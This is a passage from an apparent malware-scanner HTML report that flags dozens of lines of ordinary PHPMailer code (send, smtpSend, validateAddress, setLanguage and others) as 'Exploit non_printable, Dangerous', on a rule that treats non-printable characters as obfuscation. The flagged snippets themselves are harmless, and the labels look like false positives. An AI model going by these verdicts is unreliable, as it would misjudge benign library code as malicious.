</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1319</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getLastMessageID</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1321</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">lastMessageID</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1335</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1343</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1349</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1365</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1385</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1425</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1430</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1439</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1442</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1448</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1450</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1454</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1458</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1473</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1480</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1482</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1488</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1504</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1604</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1611</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1613</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1615</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1619</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1643</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1717</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1744</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1749</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1751</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1763</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1772</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1805</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1807</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1812</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1817</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1827</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1883</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1890</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2012</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2024</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2031</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2058</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2091</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2098</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2113</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2129</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
